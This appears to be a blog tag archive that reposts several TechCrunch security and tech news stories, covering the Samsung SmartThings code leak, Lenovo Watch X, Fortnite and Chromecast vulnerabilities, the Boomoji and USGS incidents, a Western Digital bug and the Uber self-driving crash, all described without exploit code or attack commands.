spokesperson

Samsung spilled SmartThings app source code and secret keys

Posted by | Android, Apps, computing, data breach, Dubai, Gadgets, gitlab, Password, Samsung, Security, smartphones, smartthings, SMS, Software, spokesperson, Stratics Networks | No Comments

A development lab used by Samsung engineers was leaking highly sensitive source code, credentials and secret keys for several internal projects — including its SmartThings platform, a security researcher found.

The electronics giant left dozens of internal coding projects on a GitLab instance hosted on a Samsung-owned domain, Vandev Lab. The instance, used by staff to share and contribute code to various Samsung apps, services and projects, was spilling data because the projects were set to “public” and not properly protected with a password, allowing anyone to look inside at each project, access and download the source code.

Mossab Hussein, a security researcher at Dubai-based cybersecurity firm SpiderSilk who discovered the exposed files, said one project contained credentials that allowed access to the entire AWS account that was being used, including more than 100 S3 storage buckets that contained logs and analytics data.

Many of the folders, he said, contained logs and analytics data for Samsung’s SmartThings and Bixby services, but also several employees’ exposed private GitLab tokens stored in plaintext, which allowed him to gain additional access from 42 public projects to 135 projects, including many private projects.

Samsung told him some of the files were for testing but Hussein challenged the claim, saying source code found in the GitLab repository contained the same code as the Android app, published in Google Play on April 10.

The app, which has since been updated, has more than 100 million installs to date.

“I had the private token of a user who had full access to all 135 projects on that GitLab,” he said, which could have allowed him to make code changes using a staffer’s own account.

Hussein shared several screenshots and a video of his findings for TechCrunch to examine and verify.

The exposed GitLab instance also contained private certificates for Samsung’s SmartThings’ iOS and Android apps.

Hussein also found several internal documents and slideshows among the exposed files.

“The real threat lies in the possibility of someone acquiring this level of access to the application source code, and injecting it with malicious code without the company knowing,” he said.

Through exposed private keys and tokens, Hussein documented a vast amount of access that if obtained by a malicious actor could have been “disastrous,” he said.

A screenshot of the exposed AWS credentials, allowing access to buckets with GitLab private tokens (Image: supplied)

Hussein, a white-hat hacker and data breach discoverer, reported the findings to Samsung on April 10. In the days following, Samsung began revoking the AWS credentials, but it’s not known if the remaining secret keys and certificates were revoked.

Samsung still hasn’t closed the case on Hussein’s vulnerability report, close to a month after he first disclosed the issue.

“Recently, an individual security researcher reported a vulnerability through our security rewards program regarding one of our testing platforms,” Samsung spokesperson Zach Dugan told TechCrunch when reached prior to publication. “We quickly revoked all keys and certificates for the reported testing platform and while we have yet to find evidence that any external access occurred, we are currently investigating this further.”

Hussein said Samsung took until April 30 to revoke the GitLab private keys. Samsung also declined to answer specific questions we had and provided no evidence that the Samsung-owned development environment was for testing.

Hussein is no stranger to reporting security vulnerabilities. He recently disclosed a vulnerable back-end database at Blind, an anonymous social networking site popular among Silicon Valley employees — and found a server leaking a rolling list of user passwords for scientific journal giant Elsevier.

Samsung’s data leak, he said, was his biggest find to date.

“I haven’t seen a company this big handle their infrastructure using weird practices like that,” he said.

Read more:

Powered by WPeMatico

Selfie app maker Meitu eyes overseas gaming market with $340 million deal

Posted by | Asia, Beijing, China, Gaming, Garena, hardware, huawei, meitu, netease, New York, smartphone, smartphones, Southeast Asia, spokesperson, Tencent, Xiaomi | No Comments

China’s largest selfie app maker Meitu has been busy working to diversify itself beyond the beauty arena in China. On Wednesday, the Hong Kong-listed company announced in a filing that it has agreed to pay about HK$2.7 billion ($340 million) for a 31 percent stake in game publishing company Dreamscape Horizon.

Dreamscape Horizon, a subsidiary of Hong Kong-listed games group Leyou, specializes in making video games for personal computers and consoles, and owns 97 percent of Canada-based studio Digital Extremes. This global connection will potentially hasten Meitu’s overseas expansion, and the foray into games, on the other hand, will help the Xiamen-based firm capture more male users. (Operating out of Xiamen might have also been convenient for Meitu to meet the coastal city’s booming hub of game developers.) Out of Meitu’s 110 million monthly active users overseas, only 30 million are male.

“The collaboration with Leyou is not only focused on mainland China but also the global market,” says a Meitu spokesperson in a statement. “Mainland China currently accounts for the majority of Meitu’s earnings. The acquisition will broaden our business scope and diversify the geographic streams of our income.”

The overseas move appears to be a tactical one as the domestic gaming market is crowded with established players like Tencent, NetEase and hundreds of smaller contenders. The local environment has also turned hostile to gaming companies as Beijing steps up scrutiny amid concerns of titles being violent and harmful to young players. The result was a months-long halt in game approvals that dragged down Tencent’s stock prices and prompted a major reshuffle in the giant. And before long, Tencent announced it would deepen its ties with Garena to distribute games in Southeast Asia. The hiatus ended in December, but companies are still feeling the chill as China is reportedly mulling a further pause this week.

Meitu is most famous for its suite of photo-editing and beautifying apps, but hardware has been its major income source for years. For the first half of 2018, the company generated 72 percent of its revenues from selling smartphones optimized for taking selfies, a category proven popular in a country where touched-up photos have become the norm. But Meitu’s hardware business is shrinking as smartphone shipment slows in China and phones from mainstream brands like Xiaomi and Huawei now come equipped with filters. It has, however, found a new home for its barely mainstream smartphone brand after Xiaomi gobbled it up in November to lure more female users.

Powered by WPeMatico

Lenovo Watch X was riddled with security bugs, researcher says

Posted by | api, Bluetooth, China, computer security, computing, encryption, Gadgets, lenovo, Password, smartwatches, spokesperson, Wearables, web server, Zhongguancun | No Comments

Lenovo’s Watch X was widely panned as “absolutely terrible.” As it turns out, so was its security.

The low-end $50 smartwatch was one of Lenovo’s cheapest smartwatches. Available only for the China market, anyone who wants one has to buy one directly from the mainland. Lucky for Erez Yalon, head of security research at Checkmarx, an application security testing company, he was given one from a friend. But it didn’t take him long to find several vulnerabilities that allowed him to change user’s passwords, hijack accounts and spoof phone calls.

Because the smartwatch wasn’t using any encryption to send data from the app to the server, Yalon said he was able to see his registered email address and password sent in plain text, as well as data about how he was using the watch, like how many steps he was taking.

“The entire API was unencrypted,” said Yalon in an email to TechCrunch. “All data was transferred in plain-text.”

The API that helps power the watch was easily abused, he found, allowing him to reset anyone’s password simply by knowing a person’s username. That could’ve given him access to anyone’s account, he said.

Not only that, he found that the watch was sharing his precise geolocation with a server in China. Given the watch’s exclusivity to China, it might not be a red flag to natives. But Yalon said the watch had “already pinpointed my location” before he had even registered his account.

Yalon’s research wasn’t just limited to the leaky API. He found that the Bluetooth-enabled smartwatch could also be manipulated from nearby, by sending crafted Bluetooth requests. Using a small script, he demonstrated how easy it was to spoof a phone call on the watch.

Using a similar malicious Bluetooth command, he could also set the alarm to go off — again and again. “The function allows adding multiple alarms, as often as every minute,” he said.

Lenovo didn’t have much to say about the vulnerabilities, besides confirming their existence.

“The Watch X was designed for the China market and is only available from Lenovo to limited sales channels in China,” said spokesperson Andrew Barron. “Our [security team] team has been working with the [original device manufacturer] that makes the watch to address the vulnerabilities identified by a researcher and all fixes are due to be completed this week.”

Yalon said that encrypting the traffic between the watch, the Android app and its web server would prevent snooping and help reduce manipulation.

“Fixing the API permissions eliminates the ability of malicious users to send commands to the watch, spoof calls, and set alarms,” he said.

Powered by WPeMatico

Fortnite bugs put accounts at risk of takeover

Posted by | computer security, cryptography, fortnite, Gaming, Hack, hacking, Password, Prevention, Security, security breaches, software testing, spokesperson, vulnerability | No Comments

With one click, any semi-skilled hacker could have silently taken over a Fortnite account, according to a cybersecurity firm that says the bug is now fixed.

Researchers at Check Point say the three vulnerabilities chained together could have affected any of its 200 million players. The flaws, if exploited, would have stolen the account access token set on the gamer’s device once they entered their password.

Once stolen, that token could be used to impersonate the gamer and log in as if they were the account holder, without needing their password.

The researchers say that the flaw lies in how Epic Games, the maker of Fortnite, handles login requests. Researchers said they could send any user a crafted link that appears to come from Epic Games’ own domain and steal an access token needed to break into an account.

Check Point’s Oded Vanunu explains how the bug works. (Image: supplied)

“It’s important to remember that the URL is coming from an Epic Games domain, so it’s transparent to the user and any security filter will not suspect anything,” said Oded Vanunu, Check Point’s head of products vulnerability research, in an email to TechCrunch.

Here’s how it works: The user clicks on a link, which points to an epicgames.com subdomain, which the hacker embeds a link to malicious code on their own server by exploiting a cross-site weakness in the subdomain. Once the malicious script loads, unbeknownst to the Fortnite player, it steals their account token and sends it back to the hacker.

“If the victim user is not logged into the game, he or she would have to log in first,” said Vanunu. “Once that person is logged in, the account can be stolen.”

Epic Games has since fixed the vulnerability.

“We were made aware of the vulnerabilities and they were soon addressed,” said Nick Chester, a spokesperson for Epic Games. “We thank Check Point for bringing this to our attention.”

“As always, we encourage players to protect their accounts by not re-using passwords and using strong passwords, and not sharing account information with others,” he said.

When asked, Epic Games would not say if user data or accounts were compromised as a result of this vulnerability.

Powered by WPeMatico

Hackers hijack thousands of Chromecasts to warn of latest security bug

Posted by | Amazon, chromecast, computing, echo, Gadgets, Google, Hack, hardware, iPad, media streamer, Security, smart devices, smart home devices, spokesperson, technology, wi-fi | No Comments

Hackers have hijacked thousands of exposed Chromecast streaming devices to warn users of the latest security flaw to affect the device. But other security researchers say that the bug — if left unfixed — could be used for more disruptive attacks.

The culprits, known as Hacker Giraffe and J3ws3r, have become the latest person to figure out how to trick Google’s media streamer into playing any YouTube video they want — including videos that are custom-made. This time around, the hackers hijacked forced the affected Chromecasts to display a pop-up notice that’s viewable on the connected TV, warning the user that their misconfigured router is exposing their Chromecast and smart TV to hackers like themselves.

Not one to waste an opportunity, the hackers also asks that you subscribe to PewDiePie, an awful internet person with a popular YouTube following. (He’s the same hacker who tricked thousands of exposed printers into printing support for PewDiePie.)

The bug, dubbed CastHack, exploits a weakness in both Chromecast and the router it connects to. Some home routers have enabled Universal Plug and Play (UPnP), a networking standard that can be exploited in many ways. UPnP forwards ports from the internal network to the internet, making Chromecasts and other devices viewable and accessible from anywhere on the internet.

As the two say, disabling UPnP should fix the problem.

“We have received reports from users who have had an unauthorized video played on their TVs via a Chromecast device,” a Google spokesperson told TechCrunch. “This is not an issue with Chromecast specifically, but is rather the result of router settings that make smart devices, including Chromecast, publicly reachable,” the spokesperson said.

That’s true on one hand, but it doesn’t address the underlying issue — that the Chromecast can be tricked into allowing an unauthenticated attacker the ability to hijack a media stream and display whatever they want.

Hacker Giraffe sent this YouTube video to thousands of exposed Chromecast devices, warning that their streams could be easily hijacked. (Screenshot: TechCrunch)

Bishop Fox, a security consultancy firm, first found a hijack bug in 2014, not long after the Chromecast debuted. The researchers found that they could conduct a “deauth” attack that disconnects the Chromecast from the Wi-Fi network it was connected to, causing it to revert back to its out-of-the-box state, waiting for a device to tell it where to connect and what to stream. That’s when it can be hijacked and forced to stream whatever the hijacker wants. All of this can be done in an instant — as they did — with a touch of a button on a custom-built handheld remote.

Two years later, U.K. cybersecurity firm Pen Test Partners discovered that the Chromecast was still vulnerable to “deauth” attacks, making it easy to play content on a neighbor’s Chromecasts in just a few minutes.

Ken Munro, who founded Pen Test Partners, says there’s “no surprise that somebody else stumbled on to it,” given both Bishop Fix found it in 2014 and his company tested it in 2016.

“In fairness, we never thought that the service would be exposed on the public internet, so that is a very valid finding of his, full credit to him for that,” Munro told TechCrunch. (Google said in a follow-up email that it’s working to fix the deauth bug.)

He said the way the attack is conducted is different, but the method of exploitation is the same. CastHack can be exploited over the internet, while Bishop Fox and his “deauth” attacks can be carried out within range of the Wi-Fi network — yet, both attacks let the hacker control what’s displayed on the TV from the Chromecast, he said.

Munro said Google should have fixed its bug in 2014 when it first had the chance.

“Allowing control over a local network without authentication is a really silly idea on [Google’s] part,” he said. “Because users do silly things, like expose their TVs on the internet, and hackers find bugs in services that can be exploited.”

But Munro said that these kinds of attacks — although obnoxious and intrusive on the face of it — could be exploited to have far more malicious consequences.

In a blog post Wednesday, Munro said it was easy to exploit other smart home devices — like an Amazon Echo — by hijacking a Chromecast and forcing it to play commands that are loud enough to be picked up by its microphone. That’s happened before, when smart assistants get confused when they overhear words on the television or radio, and suddenly and without warning purchase items from Amazon. (You can and should turn on a PIN for ordering through Amazon.)

To name a few, Munro said it’s possible to force a Chromecast into loading a YouTube video created by an attacker to trick an Echo to: “Alexa, order an iPad,” or, “Alexa, turn off the house alarm,” or, “Alexa, set an alarm every day at 3am.”

Amazon Echos and other smart devices are widely considered to be secure, even if they’re prone to overhearing things they shouldn’t. Often, the weakest link are humans. Second to that, it’s the other devices around smart home assistants that pose the biggest risk, said Munro in his blog post. That was demonstrated recently when Canadian security researcher Render Man showed how using a sound transducer against a window can trick a nearby Amazon Echo into unlocking a network-connected smart lock on the front door of a house.

“Google needs to properly fix the Chromecast deauth bug that allows casting of YouTube traffic,” said Munro.

Updated at 9pm ET: with a new, clearer headline to better reflect the flaws over the years, and added additional comment from Google.

Powered by WPeMatico

Popular avatar app Boomoji exposed millions of users’ contact lists and location data

Posted by | Android, california, database, General Data Protection Regulation, privacy, Security, social media, Software, spokesperson, web browser | No Comments

Popular animated avatar creator app Boomoji, with more than five million users across the world, exposed the personal data of its entire user base after it failed to put passwords on two of its internet-facing databases.

The China-based app developer left the ElasticSearch databases online without passwords — a U.S.-based database for its international customers and a Hong Kong-based database containing mostly Chinese users’ data in an effort to comply with China’s data security laws, which requires Chinese citizens’ data to be located on servers inside the country.

Anyone who knew where to look could access, edit or delete the database using their web browser. And, because the database was listed on Shodan, a search engine for exposed devices and databases, they were easily found with a few keywords.

After TechCrunch reached out, Boomoji pulled the two databases offline. “These two accounts were made by us for testing purposes,” said an unnamed Boomoji spokesperson in an email.

But that isn’t true.

The database contained records on all of the company’s iOS and Android users — some 5.3 million users as of this week. Each record contained their username, gender, country and phone type.

Each record also included a user’s unique Boomoji ID, which was linked to other tables in the database. Those other tables included if and which school they go to — a feature Boomoji touts as a way for users to get in touch with their fellow students. That unique ID also included the precise geolocation of more than 375,000 users that had allowed the app to know their location at any given time.

Worse, the database contained every phone book entry of every user who had allowed the app access to their contacts.

One table had more than 125 million contacts, including their names (as written in a user’s phone book) and their phone numbers. Each record was linked to a Boomoji’s unique ID, making it relatively easy to know whose contact list belonged to whom.

Even if you didn’t use the app, anyone who has your phone number stored on their device and used the app more than likely uploaded your number to Boomoji’s database. To our knowledge, there’s no way to opt out or have your information deleted.

Given Boomoji’s response, we verified the contents of the database by downloading the app on a dedicated iPhone using a throwaway phone number, containing a few dummy, but easy-to-search contact list entries. To find friends, the app matches your contacts with those registered with the app in its database. When we were prompted to allow the app access to our contacts list, the entire dummy contact list was uploaded instantly — and viewable in the database.

So long as the app was installed and had access to the contacts, new phone numbers would be automatically uploaded.

Yet, none of the data was encrypted. All of the data was stored in plaintext.

Although Boomoji is based in China, it claims to follow California state law, where data protection and privacy rules are some of the strongest in the U.S. We asked Boomoji if it has or plans to inform California’s attorney general of the exposure as required by state law, but the company did not answer.

Given the vast amount of European users’ information in the database, the company may also face penalties under the EU’s General Data Protection Regulation, which can impose fines of up to four percent of the company’s global annual revenue for serious breaches.

But given its China-based presence, it’s not clear, however, what actionable repercussions the company could face.

This is the latest in a series of exposures involving ElasticSearch instances, a popular open source search and database software. In recent weeks, several high-profile data exposures have been reported as a result of companies’ failure to practice basic data security measures — including Urban Massage exposing its own customer database, Mindbody-owned FitMetrix forgetting to put a password on its servers and Voxox, a communications company, which leaked phone numbers and two-factor codes on millions of unsuspecting users.


Got a tip? You can send tips securely over Signal and WhatsApp to +1 646-755–8849. You can also send PGP email with the fingerprint: 4D0E 92F2 E36A EC51 DAAE 5D97 CB8C 15FA EB6C EEA5.

Powered by WPeMatico

Civil servant who watched porn at work blamed for infecting a US government network with malware

Posted by | Android, computer security, computing, cybercrime, Cyberwarfare, Government, malware, national security, Prevention, ransomware, Removable media, Security, security breaches, spokesperson, U.S. government, United States | No Comments

A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.

The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.

Investigators found that his Android cell phone “was also infected with malware.”

The findings were made public in a report earlier this month but buried on the U.S. government’s oversight website and went largely unreported.

It’s bad enough in this day and age that a government watchdog has to remind civil servants to not watch porn at work — let alone on their work laptop. The inspector general didn’t say what the employee’s fate was, but ripped into the Department of the Interior’s policies for letting him get that far in the first place.

“We identified two vulnerabilities in the USGS’ IT security posture: web-site access and open USB ports,” the report said.

There is a (slightly) bright side. The EROS Center, which monitors and archives images of the planet’s land surface, doesn’t operate any classified networks, a spokesperson for Interior’s inspector general told TechCrunch in an email, ruling out any significant harm to national security. But the spokesperson wouldn’t say what kind of malware used — only that, “the malware helps enable data exfiltration and is also associated with ransomware attacks.”

Investigators recommended that USGS enforce a “strong blacklist policy” of known unauthorized websites and “regularly monitor employee web usage history.”

The report also said the agency should lock down its USB drive policy, restricting employees from using removable media on government devices, but it’s not known if the recommendations have yet gone into place. USGS did not return a request for comment.

Powered by WPeMatico

Password bypass flaw in Western Digital My Cloud drives puts data at risk

Posted by | cloud computing, computer security, computing, exploit, firmware, Gadgets, hacking, hardware, Security, software testing, spokesperson, Twitter, vulnerability, Western Digital | No Comments

A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.

Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.

The exploit works because drive’s web-based dashboard doesn’t properly check a user’s credentials before giving a possible attacker access to tools that should require higher levels of access.

The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.

Details of the bug were also independently found by another security team, which released its own exploit code.

Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.

After he found that WD updated the My Cloud firmware in the meanwhile without fixing the vulnerability he found, he decided to post his findings.

A year later, WD still hasn’t released a patch.

The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”

WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.

In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Powered by WPeMatico

Video: The driver of the autonomous Uber was distracted before fatal crash

Posted by | arizona, Automation, autonomous car, car sharing, commuting, Gadgets, pittsburgh, San Francisco, self-driving car, spokesperson, toronto, Toyota, transport, Uber, United States, volvo | No Comments

The Tempe, Arizona police department have released a video showing the moments before the fatal crash that involved Uber’s self-driving car. The video includes the view of the street from the Uber and a view of minder behind the wheel of the autonomous Uber.

Warning: This video is disturbing.

Tempe Police Vehicular Crimes Unit is actively investigating
the details of this incident that occurred on March 18th. We will provide updated information regarding the investigation once it is available. pic.twitter.com/2dVP72TziQ

— Tempe Police (@TempePolice) March 21, 2018

The video shows the victim crossing a dark street when an Uber self-driving Volvo XC90 strikes her at 40 mph. It also shows the person who is supposed to be babysitting the autonomous vehicle looking down moments before the crash. It’s unclear what is distracting the minder. It’s also unclear why Uber’s systems did not detect and react to the victim who was clearly moving across its range of sensors at walking speeds.

Uber provided the following statement regarding the incident to TechCrunch:

Our hearts go out to the victim’s family. We are fully cooperating with local authorities in their investigation of this incident.

Since the crash on March 19, Uber has pulled all its vehicles from the roads operating in Pittsburgh, Tempe, San Francisco and Toronto. This is the first time an autonomous vehicle operating in self-driving mode has resulted in a human death. In a statement to TechCrunch, the NHTSA said it has sent over its “Special Crash Investigation” team to Tempe. This is “consistent with NHTSA’s vigilant oversight and authority over the safety of all motor vehicles and equipment, including automated technologies,” a spokesperson for the agency told TechCrunch.

“NHTSA is also in contact with Uber, Volvo, Federal, State and local authorities regarding the incident,” the spokesperson said. “The agency will review the information and proceed as warranted.”

Toyota also paused its self-driving testing in the US following the accident.

This tragic accident is the sort of situation self-driving vehicles are supposed to address. After all, these systems are supposed to be able to see through the dark and cannot get distracted by Twitter.

Powered by WPeMatico